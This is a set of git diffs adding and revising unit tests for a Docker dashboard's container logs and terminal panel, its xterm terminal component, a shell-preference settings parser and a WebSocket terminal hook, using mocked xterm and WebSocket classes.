--- a/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
@@ -1,0 +1,109 @@
+import { describe, it, expect, mock } from 'bun:test';
+import { render, screen, fireEvent } from '@testing-library/react';
+import { createStore, Provider } from 'jotai';
+import type { DockerInventorySnapshotContainer } from '@/types/docker-inventory';
+
+mock.module('@/components/docker/ContainerLogViewer', () => ({
+  default: ({ containerId }: { containerId: string }) => (
+    <div data-testid="log-viewer">{containerId}</div>
+  ),
+}));
+
+mock.module('@/components/docker/ContainerTerminal', () => ({
+  default: ({ frozen }: { frozen: boolean }) => (
+    <div data-testid="terminal" data-frozen={String(frozen)} />
+  ),
+}));
+
+const mockGetContainerShell = mock(() => undefined as string | undefined);
+const mockSetContainerShell = mock(() => {});
+
+mock.module('@/hooks/useDockerSettings', () => ({
+  useDockerSettings: () => ({
+    getContainerShell: mockGetContainerShell,
+    setContainerShell: mockSetContainerShell,
+  }),
+}));
+
+const runningInventory: DockerInventorySnapshotContainer = {
+  host: 'server1',
+  containerId: 'abc123',
+  name: 'nginx',
+  image: 'nginx:latest',
+  state: 'running',
+  composeProject: null,
+  serviceKey: 'nginx',
+  startedAt: new Date(),
+  finishedAt: null,
+  exitCode: null,
+  labels: {},
+  updatedAt: new Date(),
+};
+
+const stoppedInventory: DockerInventorySnapshotContainer = {
+  ...runningInventory,
+  state: 'exited',
+};
+
+function renderPanel(inventory = runningInventory) {
+  const store = createStore();
+  return render(
+    <Provider store={store}>
+      <ContainerLogsTerminalPanel containerId="abc123" host="server1" inventory={inventory} />
+    </Provider>,
+  );
+}
+
+const { default: ContainerLogsTerminalPanel } = await import('../ContainerLogsTerminalPanel');
+
+describe('ContainerLogsTerminalPanel', () => {
+  it('shows Logs tab active by default', () => {
+    renderPanel();
+    const logsTab = screen.getByRole('tab', { name: /logs/i });
+    expect(logsTab.getAttribute('aria-selected')).toBe('true');
+  });
+
+  it('renders log viewer by default', () => {
+    renderPanel();
+    expect(screen.getByTestId('log-viewer')).toBeTruthy();
+  });
+
+  it('Terminal tab is disabled when container is not running', () => {
+    renderPanel(stoppedInventory);
+    const termTab = screen.getByRole('tab', { name: /terminal/i });
+    expect(termTab.hasAttribute('disabled')).toBe(true);
+  });
+
+  it('Terminal tab is enabled when container is running', () => {
+    renderPanel(runningInventory);
+    const termTab = screen.getByRole('tab', { name: /terminal/i });
+    expect(termTab.hasAttribute('disabled')).toBe(false);
+  });
+
+  it('clicking Terminal tab mounts and shows terminal component', () => {
+    renderPanel(runningInventory);
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+    expect(screen.getByTestId('terminal')).toBeTruthy();
+  });
+
+  it('shell selector visible only on Terminal tab', () => {
+    renderPanel(runningInventory);
+    expect(screen.queryByLabelText(/shell/i)).toBeNull();
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+    expect(screen.getByLabelText(/shell/i)).toBeTruthy();
+  });
+
+  it('frozen=true passed to terminal when container stops mid-session', () => {
+    const { rerender } = renderPanel(runningInventory);
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+
+    rerender(
+      <Provider store={createStore()}>
+        <ContainerLogsTerminalPanel containerId="abc123" host="server1" inventory={stoppedInventory} />
+      </Provider>,
+    );
+
+    const terminal = screen.getByTestId('terminal');
+    expect(terminal.getAttribute('data-frozen')).toBe('true');
+  });
+});

--- a/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
@@ -94,11 +94,19 @@ describe('ContainerLogsTerminalPanel', () => {
   });
 
   it('frozen=true passed to terminal when container stops mid-session', () => {
-    const { rerender } = renderPanel(runningInventory);
+    // Must reuse the same store on rerender; a new <Provider store={...}>
+    // would remount the panel and lose the `terminalMounted` local state
+    // set by the click, defeating the test.
+    const store = createStore();
+    const { rerender } = render(
+      <Provider store={store}>
+        <ContainerLogsTerminalPanel containerId="abc123" host="server1" inventory={runningInventory} />
+      </Provider>,
+    );
     fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
 
     rerender(
-      <Provider store={createStore()}>
+      <Provider store={store}>
         <ContainerLogsTerminalPanel containerId="abc123" host="server1" inventory={stoppedInventory} />
       </Provider>,
     );

--- a/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
@@ -73,7 +73,7 @@ function renderPanel(inventory = runningInventory) {
   );
 }
 
-const { default: ContainerLogsTerminalPanel } = await import('../ContainerLogsTerminalPanel');
+const { default: ContainerLogsTerminalPanel } = await import('@/components/docker/ContainerLogsTerminalPanel');
 
 describe('ContainerLogsTerminalPanel', () => {
   beforeEach(() => {

--- a/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
@@ -1,4 +1,4 @@
-import { describe, it, expect, mock } from 'bun:test';
+import { describe, it, expect, mock, beforeEach } from 'bun:test';
 import { useState } from 'react';
 import { render, screen, fireEvent } from '@testing-library/react';
 import { createStore, Provider } from 'jotai';
@@ -15,14 +15,21 @@ mock.module('@/components/docker/ContainerLogViewer', () => ({
 // across tab switches.
 let __nextTerminalInstanceId = 0;
 mock.module('@/components/docker/ContainerTerminal', () => {
-  function MockContainerTerminal({ frozen }: { frozen: boolean }) {
+  function MockContainerTerminal({ frozen, shell }: { frozen: boolean; shell: string }) {
     // useState seed runs once per mounted component instance; if the panel
     // remounts ContainerTerminal on tab switch, this id will change.
     const [id] = useState(() => {
       __nextTerminalInstanceId += 1;
       return `term-${__nextTerminalInstanceId}`;
     });
-    return <div data-testid="terminal" data-frozen={String(frozen)} data-instance-id={id} />;
+    return (
+      <div
+        data-testid="terminal"
+        data-frozen={String(frozen)}
+        data-shell={shell}
+        data-instance-id={id}
+      />
+    );
   }
   return { default: MockContainerTerminal };
 });
@@ -69,6 +76,12 @@ function renderPanel(inventory = runningInventory) {
 const { default: ContainerLogsTerminalPanel } = await import('../ContainerLogsTerminalPanel');
 
 describe('ContainerLogsTerminalPanel', () => {
+  beforeEach(() => {
+    mockGetContainerShell.mockReturnValue(undefined);
+    mockSetContainerShell.mockClear();
+    __nextTerminalInstanceId = 0;
+  });
+
   it('shows Logs tab active by default', () => {
     renderPanel();
     const logsTab = screen.getByRole('tab', { name: /logs/i });
@@ -123,6 +136,24 @@ describe('ContainerLogsTerminalPanel', () => {
 
     const finalId = screen.getByTestId('terminal').getAttribute('data-instance-id');
     expect(finalId).toBe(firstId);
+  });
+
+  it('calls setContainerShell with the correct key when shell selector changes', () => {
+    renderPanel(runningInventory);
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+    // Open the Select and pick 'bash'
+    fireEvent.mouseDown(screen.getByRole('combobox'));
+    fireEvent.click(screen.getByRole('option', { name: 'bash' }));
+    // shellKey is `${host}/${inventory.name}` = 'server1/nginx'
+    expect(mockSetContainerShell).toHaveBeenCalledWith('server1/nginx', 'bash');
+  });
+
+  it('passes saved shell preference as effectiveShell to ContainerTerminal', () => {
+    mockGetContainerShell.mockReturnValue('bash');
+    renderPanel(runningInventory);
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+    const terminal = screen.getByTestId('terminal');
+    expect(terminal.getAttribute('data-shell')).toBe('bash');
   });
 
   it('frozen=true passed to terminal when container stops mid-session', () => {

--- a/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
+++ b/src/components/docker/__tests__/ContainerLogsTerminalPanel.test.tsx
@@ -1,4 +1,5 @@
 import { describe, it, expect, mock } from 'bun:test';
+import { useState } from 'react';
 import { render, screen, fireEvent } from '@testing-library/react';
 import { createStore, Provider } from 'jotai';
 import type { DockerInventorySnapshotContainer } from '@/types/docker-inventory';
@@ -9,11 +10,22 @@ mock.module('@/components/docker/ContainerLogViewer', () => ({
   ),
 }));
 
-mock.module('@/components/docker/ContainerTerminal', () => ({
-  default: ({ frozen }: { frozen: boolean }) => (
-    <div data-testid="terminal" data-frozen={String(frozen)} />
-  ),
-}));
+// Each render of the mocked ContainerTerminal stamps a unique instance id so
+// tests can prove the same React node persisted (not unmounted/remounted)
+// across tab switches.
+let __nextTerminalInstanceId = 0;
+mock.module('@/components/docker/ContainerTerminal', () => {
+  function MockContainerTerminal({ frozen }: { frozen: boolean }) {
+    // useState seed runs once per mounted component instance; if the panel
+    // remounts ContainerTerminal on tab switch, this id will change.
+    const [id] = useState(() => {
+      __nextTerminalInstanceId += 1;
+      return `term-${__nextTerminalInstanceId}`;
+    });
+    return <div data-testid="terminal" data-frozen={String(frozen)} data-instance-id={id} />;
+  }
+  return { default: MockContainerTerminal };
+});
 
 const mockGetContainerShell = mock(() => undefined as string | undefined);
 const mockSetContainerShell = mock(() => {});
@@ -91,6 +103,26 @@ describe('ContainerLogsTerminalPanel', () => {
     expect(screen.queryByLabelText(/shell/i)).toBeNull();
     fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
     expect(screen.getByLabelText(/shell/i)).toBeTruthy();
+  });
+
+  it('keeps ContainerTerminal mounted across Logs<->Terminal tab switches', () => {
+    // The panel uses CSS hiding (className 'hidden') rather than conditional
+    // mounting so xterm's scrollback survives tab switches. A regression to
+    // {tab === 'terminal' && <ContainerTerminal/>} would unmount the terminal,
+    // dropping its instance id between visits.
+    renderPanel(runningInventory);
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+    const firstId = screen.getByTestId('terminal').getAttribute('data-instance-id');
+    expect(firstId).toBeTruthy();
+
+    // Logs -> Terminal -> Logs -> Terminal: instance id must remain constant.
+    fireEvent.click(screen.getByRole('tab', { name: /logs/i }));
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+    fireEvent.click(screen.getByRole('tab', { name: /logs/i }));
+    fireEvent.click(screen.getByRole('tab', { name: /terminal/i }));
+
+    const finalId = screen.getByTestId('terminal').getAttribute('data-instance-id');
+    expect(finalId).toBe(firstId);
   });
 
   it('frozen=true passed to terminal when container stops mid-session', () => {

--- a/src/components/docker/__tests__/ContainerTerminal.test.tsx
+++ b/src/components/docker/__tests__/ContainerTerminal.test.tsx
@@ -43,12 +43,14 @@ mock.module('@xterm/xterm/css/xterm.css', () => ({}));
 interface MockHookReturn {
   isConnected: boolean;
   error: Error | null;
+  resolvedShell?: string;
   sessionEnded: boolean;
   reconnect: () => void;
 }
 const defaultHookReturn: MockHookReturn = {
   isConnected: false,
   error: null,
+  resolvedShell: undefined,
   sessionEnded: false,
   reconnect: () => {},
 };
@@ -111,6 +113,37 @@ describe('ContainerTerminal', () => {
     render(<ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />);
     expect(screen.getByText('Session ended')).toBeTruthy();
     expect(screen.getByRole('button', { name: 'Reconnect' })).toBeTruthy();
+  });
+
+  it('shows frozen overlay and suppresses error overlay when both frozen and error are set', () => {
+    mockUseContainerTerminal.mockReturnValue({
+      ...defaultHookReturn,
+      error: new Error('test error'),
+    });
+    render(
+      <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={true} />,
+    );
+    // frozen overlay must be visible
+    expect(screen.getByText('Container stopped')).toBeTruthy();
+    // error overlay is gated on !frozen, so it must not appear
+    expect(screen.queryByText('test error')).toBeNull();
+  });
+
+  it('calls onShellResolved with the resolved shell name', async () => {
+    const onShellResolved = mock(() => {});
+    mockUseContainerTerminal.mockReturnValue({ ...defaultHookReturn, resolvedShell: 'bash' });
+    render(
+      <ContainerTerminal
+        containerId="abc123"
+        host="server1"
+        shell="auto"
+        frozen={false}
+        onShellResolved={onShellResolved}
+      />,
+    );
+    // The useEffect that calls onShellResolved runs after render; flush with act.
+    await act(async () => { await new Promise((r) => setTimeout(r, 0)); });
+    expect(onShellResolved).toHaveBeenCalledWith('bash');
   });
 
   it('flips terminal.options.disableStdin to match the frozen prop on rerender', async () => {

--- a/src/components/docker/__tests__/ContainerTerminal.test.tsx
+++ b/src/components/docker/__tests__/ContainerTerminal.test.tsx
@@ -1,4 +1,4 @@
-import { describe, it, expect, mock } from 'bun:test';
+import { describe, it, expect, mock, beforeEach } from 'bun:test';
 import { render, screen } from '@testing-library/react';
 
 mock.module('@xterm/xterm', () => ({
@@ -24,8 +24,21 @@ mock.module('@xterm/addon-fit', () => ({
 
 mock.module('@xterm/xterm/css/xterm.css', () => ({}));
 
+interface MockHookReturn {
+  isConnected: boolean;
+  error: Error | null;
+  sessionEnded: boolean;
+  reconnect: () => void;
+}
+const defaultHookReturn: MockHookReturn = {
+  isConnected: false,
+  error: null,
+  sessionEnded: false,
+  reconnect: () => {},
+};
+const mockUseContainerTerminal = mock(() => defaultHookReturn);
 mock.module('@/hooks/useContainerTerminal', () => ({
-  useContainerTerminal: () => ({ isConnected: false, error: null, sessionEnded: false, reconnect: () => {} }),
+  useContainerTerminal: mockUseContainerTerminal,
 }));
 
 class MockResizeObserver {
@@ -38,6 +51,10 @@ class MockResizeObserver {
 const { default: ContainerTerminal } = await import('../ContainerTerminal');
 
 describe('ContainerTerminal', () => {
+  beforeEach(() => {
+    mockUseContainerTerminal.mockReturnValue(defaultHookReturn);
+  });
+
   it('renders without crashing', () => {
     const { container } = render(
       <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />,
@@ -66,21 +83,15 @@ describe('ContainerTerminal', () => {
     expect(container.querySelectorAll('.MuiSkeleton-root').length).toBeGreaterThan(0);
   });
 
-  it('shows error overlay when error occurs and not frozen', async () => {
-    mock.module('@/hooks/useContainerTerminal', () => ({
-      useContainerTerminal: () => ({ isConnected: false, error: new Error('Connection refused'), sessionEnded: false, reconnect: () => {} }),
-    }));
-    const { default: CT } = await import('../ContainerTerminal');
-    render(<CT containerId="abc123" host="server1" shell="bash" frozen={false} />);
+  it('shows error overlay when error occurs and not frozen', () => {
+    mockUseContainerTerminal.mockReturnValue({ ...defaultHookReturn, error: new Error('Connection refused') });
+    render(<ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />);
     expect(screen.getByText('Connection refused')).toBeTruthy();
   });
 
-  it('shows Session ended overlay with Reconnect button when the WS closes cleanly', async () => {
-    mock.module('@/hooks/useContainerTerminal', () => ({
-      useContainerTerminal: () => ({ isConnected: false, error: null, sessionEnded: true, reconnect: () => {} }),
-    }));
-    const { default: CT } = await import('../ContainerTerminal');
-    render(<CT containerId="abc123" host="server1" shell="bash" frozen={false} />);
+  it('shows Session ended overlay with Reconnect button when the WS closes cleanly', () => {
+    mockUseContainerTerminal.mockReturnValue({ ...defaultHookReturn, sessionEnded: true });
+    render(<ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />);
     expect(screen.getByText('Session ended')).toBeTruthy();
     expect(screen.getByRole('button', { name: 'Reconnect' })).toBeTruthy();
   });

--- a/src/components/docker/__tests__/ContainerTerminal.test.tsx
+++ b/src/components/docker/__tests__/ContainerTerminal.test.tsx
@@ -1,0 +1,77 @@
+import { describe, it, expect, mock } from 'bun:test';
+import { render, screen } from '@testing-library/react';
+
+mock.module('@xterm/xterm', () => ({
+  default: {
+    Terminal: class MockTerminal {
+      options: Record<string, unknown> = {};
+      loadAddon = mock(() => {});
+      open = mock(() => {});
+      dispose = mock(() => {});
+      writeln = mock(() => {});
+      onData = mock(() => ({ dispose: mock(() => {}) }));
+      onResize = mock(() => ({ dispose: mock(() => {}) }));
+      cols = 80;
+      rows = 24;
+      constructor(opts: Record<string, unknown>) { this.options = { ...opts }; }
+    },
+  },
+}));
+
+mock.module('@xterm/addon-fit', () => ({
+  default: { FitAddon: class { fit = mock(() => {}); activate = mock(() => {}); } },
+}));
+
+mock.module('@xterm/xterm/css/xterm.css', () => ({}));
+
+mock.module('@/hooks/useContainerTerminal', () => ({
+  useContainerTerminal: () => ({ isConnected: false, error: null }),
+}));
+
+class MockResizeObserver {
+  observe = mock(() => {});
+  disconnect = mock(() => {});
+  unobserve = mock(() => {});
+}
+(globalThis as unknown as { ResizeObserver: unknown }).ResizeObserver = MockResizeObserver;
+
+const { default: ContainerTerminal } = await import('../ContainerTerminal');
+
+describe('ContainerTerminal', () => {
+  it('renders without crashing', () => {
+    const { container } = render(
+      <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />,
+    );
+    expect(container).toBeTruthy();
+  });
+
+  it('shows frozen overlay when frozen=true', () => {
+    render(
+      <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={true} />,
+    );
+    expect(screen.getByText('Container stopped')).toBeTruthy();
+  });
+
+  it('does not show frozen overlay when frozen=false', () => {
+    render(
+      <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />,
+    );
+    expect(screen.queryByText('Container stopped')).toBeNull();
+  });
+
+  it('shows skeleton when not connected and not frozen', () => {
+    const { container } = render(
+      <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />,
+    );
+    expect(container.querySelectorAll('.MuiSkeleton-root').length).toBeGreaterThan(0);
+  });
+
+  it('shows error overlay when error occurs and not frozen', async () => {
+    mock.module('@/hooks/useContainerTerminal', () => ({
+      useContainerTerminal: () => ({ isConnected: false, error: new Error('Connection refused') }),
+    }));
+    const { default: CT } = await import('../ContainerTerminal');
+    render(<CT containerId="abc123" host="server1" shell="bash" frozen={false} />);
+    expect(screen.getByText('Connection refused')).toBeTruthy();
+  });
+});

--- a/src/components/docker/__tests__/ContainerTerminal.test.tsx
+++ b/src/components/docker/__tests__/ContainerTerminal.test.tsx
@@ -1,9 +1,22 @@
 import { describe, it, expect, mock, beforeEach } from 'bun:test';
-import { render, screen } from '@testing-library/react';
+import { act, render, screen } from '@testing-library/react';
+
+interface MockTerminalShape {
+  options: Record<string, unknown>;
+  loadAddon: ReturnType<typeof mock>;
+  open: ReturnType<typeof mock>;
+  dispose: ReturnType<typeof mock>;
+  writeln: ReturnType<typeof mock>;
+  onData: ReturnType<typeof mock>;
+  onResize: ReturnType<typeof mock>;
+  cols: number;
+  rows: number;
+}
+const mockTerminalInstances: MockTerminalShape[] = [];
 
 mock.module('@xterm/xterm', () => ({
   default: {
-    Terminal: class MockTerminal {
+    Terminal: class MockTerminal implements MockTerminalShape {
       options: Record<string, unknown> = {};
       loadAddon = mock(() => {});
       open = mock(() => {});
@@ -13,7 +26,10 @@ mock.module('@xterm/xterm', () => ({
       onResize = mock(() => ({ dispose: mock(() => {}) }));
       cols = 80;
       rows = 24;
-      constructor(opts: Record<string, unknown>) { this.options = { ...opts }; }
+      constructor(opts: Record<string, unknown>) {
+        this.options = { ...opts };
+        mockTerminalInstances.push(this);
+      }
     },
   },
 }));
@@ -53,6 +69,7 @@ const { default: ContainerTerminal } = await import('../ContainerTerminal');
 describe('ContainerTerminal', () => {
   beforeEach(() => {
     mockUseContainerTerminal.mockReturnValue(defaultHookReturn);
+    mockTerminalInstances.length = 0;
   });
 
   it('renders without crashing', () => {
@@ -94,5 +111,27 @@ describe('ContainerTerminal', () => {
     render(<ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />);
     expect(screen.getByText('Session ended')).toBeTruthy();
     expect(screen.getByRole('button', { name: 'Reconnect' })).toBeTruthy();
+  });
+
+  it('flips terminal.options.disableStdin to match the frozen prop on rerender', async () => {
+    // useXtermSetup creates the Terminal inside an async useEffect; wait a tick
+    // inside act() so React state updates are committed before assertions.
+    const { rerender } = render(
+      <ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />,
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const term = mockTerminalInstances.at(-1);
+    if (!term) throw new Error('expected mock Terminal to be constructed');
+    expect(term.options.disableStdin).toBe(false);
+
+    await act(async () => {
+      rerender(<ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={true} />);
+    });
+    expect(term.options.disableStdin).toBe(true);
+
+    await act(async () => {
+      rerender(<ContainerTerminal containerId="abc123" host="server1" shell="bash" frozen={false} />);
+    });
+    expect(term.options.disableStdin).toBe(false);
   });
 });

--- a/src/components/docker/__tests__/ContainerTerminal.test.tsx
+++ b/src/components/docker/__tests__/ContainerTerminal.test.tsx
@@ -66,7 +66,7 @@ class MockResizeObserver {
 }
 (globalThis as unknown as { ResizeObserver: unknown }).ResizeObserver = MockResizeObserver;
 
-const { default: ContainerTerminal } = await import('../ContainerTerminal');
+const { default: ContainerTerminal } = await import('@/components/docker/ContainerTerminal');
 
 describe('ContainerTerminal', () => {
   beforeEach(() => {

--- a/src/components/docker/__tests__/ContainerTerminal.test.tsx
+++ b/src/components/docker/__tests__/ContainerTerminal.test.tsx
@@ -25,7 +25,7 @@ mock.module('@xterm/addon-fit', () => ({
 mock.module('@xterm/xterm/css/xterm.css', () => ({}));
 
 mock.module('@/hooks/useContainerTerminal', () => ({
-  useContainerTerminal: () => ({ isConnected: false, error: null }),
+  useContainerTerminal: () => ({ isConnected: false, error: null, sessionEnded: false, reconnect: () => {} }),
 }));
 
 class MockResizeObserver {
@@ -68,10 +68,20 @@ describe('ContainerTerminal', () => {
 
   it('shows error overlay when error occurs and not frozen', async () => {
     mock.module('@/hooks/useContainerTerminal', () => ({
-      useContainerTerminal: () => ({ isConnected: false, error: new Error('Connection refused') }),
+      useContainerTerminal: () => ({ isConnected: false, error: new Error('Connection refused'), sessionEnded: false, reconnect: () => {} }),
     }));
     const { default: CT } = await import('../ContainerTerminal');
     render(<CT containerId="abc123" host="server1" shell="bash" frozen={false} />);
     expect(screen.getByText('Connection refused')).toBeTruthy();
+  });
+
+  it('shows Session ended overlay with Reconnect button when the WS closes cleanly', async () => {
+    mock.module('@/hooks/useContainerTerminal', () => ({
+      useContainerTerminal: () => ({ isConnected: false, error: null, sessionEnded: true, reconnect: () => {} }),
+    }));
+    const { default: CT } = await import('../ContainerTerminal');
+    render(<CT containerId="abc123" host="server1" shell="bash" frozen={false} />);
+    expect(screen.getByText('Session ended')).toBeTruthy();
+    expect(screen.getByRole('button', { name: 'Reconnect' })).toBeTruthy();
   });
 });

--- a/src/hooks/__tests__/settingsAtom.test.ts
+++ b/src/hooks/__tests__/settingsAtom.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from 'bun:test';
 import { parseSettings } from '@/hooks/settingsAtom';
 
-describe('parseSettings — containerShells', () => {
+describe('parseSettings: containerShells', () => {
   it('defaults containerShells to empty object when key absent', () => {
     const settings = parseSettings({});
     expect(settings.docker.containerShells).toEqual({});

--- a/src/hooks/__tests__/settingsAtom.test.ts
+++ b/src/hooks/__tests__/settingsAtom.test.ts
@@ -1,0 +1,21 @@
+import { describe, it, expect } from 'bun:test';
+import { parseSettings } from '@/hooks/settingsAtom';
+
+describe('parseSettings — containerShells', () => {
+  it('defaults containerShells to empty object when key absent', () => {
+    const settings = parseSettings({});
+    expect(settings.docker.containerShells).toEqual({});
+  });
+
+  it('parses a valid containerShells JSON map', () => {
+    const settings = parseSettings({
+      'docker/containerShells': JSON.stringify({ 'server1/nginx': 'bash', 'server1/redis': 'sh' }),
+    });
+    expect(settings.docker.containerShells).toEqual({ 'server1/nginx': 'bash', 'server1/redis': 'sh' });
+  });
+
+  it('falls back to empty object on invalid JSON', () => {
+    const settings = parseSettings({ 'docker/containerShells': '{not-json}' });
+    expect(settings.docker.containerShells).toEqual({});
+  });
+});

--- a/src/hooks/__tests__/useContainerTerminal.test.ts
+++ b/src/hooks/__tests__/useContainerTerminal.test.ts
@@ -1,14 +1,18 @@
 import { describe, it, expect, mock, beforeEach } from 'bun:test';
 import { renderHook, act } from '@testing-library/react';
 
-// Mock WebSocket
+// Mock WebSocket. Real WebSockets start in CONNECTING (0) and only transition
+// to OPEN (1) after the handshake; the hook gates ws.send on OPEN, so the mock
+// must replicate that or a regression that sends stdin before open would slip
+// through. Tests call `triggerOpen()` to advance the state.
 const mockWsInstances: MockWebSocket[] = [];
 
 class MockWebSocket {
+  static CONNECTING = 0;
   static OPEN = 1;
   static CLOSING = 2;
   static CLOSED = 3;
-  readyState = MockWebSocket.OPEN;
+  readyState = MockWebSocket.CONNECTING;
   binaryType = 'blob';
   onopen: ((e: Event) => void) | null = null;
   onmessage: ((e: MessageEvent) => void) | null = null;
@@ -19,8 +23,11 @@ class MockWebSocket {
 
   constructor(public url: string) {
     mockWsInstances.push(this);
-    // Simulate immediate open on next tick
-    Promise.resolve().then(() => this.onopen?.(new Event('open')));
+  }
+
+  triggerOpen() {
+    this.readyState = MockWebSocket.OPEN;
+    this.onopen?.(new Event('open'));
   }
 }
 
@@ -40,6 +47,17 @@ const mockTerminal = {
 
 const { useContainerTerminal } = await import('@/hooks/useContainerTerminal');
 
+/** Settle effects and transition the latest MockWebSocket to OPEN, mirroring the real handshake. */
+async function settleAndOpen(): Promise<void> {
+  await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+  await act(async () => { mockWsInstances.at(-1)?.triggerOpen(); });
+}
+
+/** For tests that assert NO WebSocket is constructed (enabled=false, terminal=null). */
+async function flushMicrotasksWithoutOpening(): Promise<void> {
+  await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+}
+
 describe('useContainerTerminal', () => {
   beforeEach(() => {
     mockWsInstances.length = 0;
@@ -57,7 +75,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     expect(result.current.isConnected).toBe(true);
   });
 
@@ -70,7 +88,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     expect(mockWsInstances[0]?.url).toContain('/api/docker-exec/my-container');
     expect(mockWsInstances[0]?.url).toContain('host=server1');
     expect(mockWsInstances[0]?.url).toContain('shell=bash');
@@ -85,7 +103,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     const ws = mockWsInstances[0]!;
     act(() => {
       ws.onmessage?.({ data: JSON.stringify({ type: 'shell', name: 'sh' }) } as MessageEvent);
@@ -103,7 +121,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     const ws = mockWsInstances[0]!;
     act(() => { ws.onmessage?.({ data: 'not-json-at-all' } as MessageEvent); });
     expect(result.current.resolvedShell).toBeUndefined();
@@ -119,7 +137,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     const ws = mockWsInstances[0]!;
     act(() => { ws.onmessage?.({ data: new ArrayBuffer(4) } as MessageEvent); });
     expect(mockTerminal.write).toHaveBeenCalledWith(expect.any(Uint8Array));
@@ -134,7 +152,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     act(() => { listeners['data']?.('ls\r'); });
     expect(mockWsInstances[0]?.send).toHaveBeenCalledWith('ls\r');
   });
@@ -148,7 +166,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     act(() => { listeners['resize']?.({ cols: 120, rows: 40 }); });
     const allCalls = mockWsInstances[0]?.send.mock.calls as unknown as unknown[][];
     const call = allCalls?.find(
@@ -167,7 +185,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     const ws = mockWsInstances[0]!;
     act(() => { ws.onclose?.({ code: 1000, reason: 'Shell exited' } as CloseEvent); });
     expect(result.current.sessionEnded).toBe(true);
@@ -184,11 +202,12 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     expect(mockWsInstances.length).toBe(1);
     act(() => { mockWsInstances[0]!.onclose?.({ code: 1000, reason: '' } as CloseEvent); });
     expect(result.current.sessionEnded).toBe(true);
     await act(async () => { result.current.reconnect(); await new Promise((r) => setTimeout(r, 10)); });
+    act(() => { mockWsInstances.at(-1)?.triggerOpen(); });
     expect(mockWsInstances.length).toBe(2);
     expect(result.current.sessionEnded).toBe(false);
   });
@@ -202,7 +221,7 @@ describe('useContainerTerminal', () => {
         terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await settleAndOpen();
     const ws = mockWsInstances[0]!;
     act(() => { ws.onclose?.({ code: 1011, reason: 'Shell exited' } as CloseEvent); });
     expect(result.current.error).not.toBeNull();
@@ -219,7 +238,7 @@ describe('useContainerTerminal', () => {
         enabled: false,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await flushMicrotasksWithoutOpening();
     expect(mockWsInstances.length).toBe(0);
   });
 
@@ -232,7 +251,73 @@ describe('useContainerTerminal', () => {
         terminal: null,
       }),
     );
-    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    await flushMicrotasksWithoutOpening();
     expect(mockWsInstances.length).toBe(0);
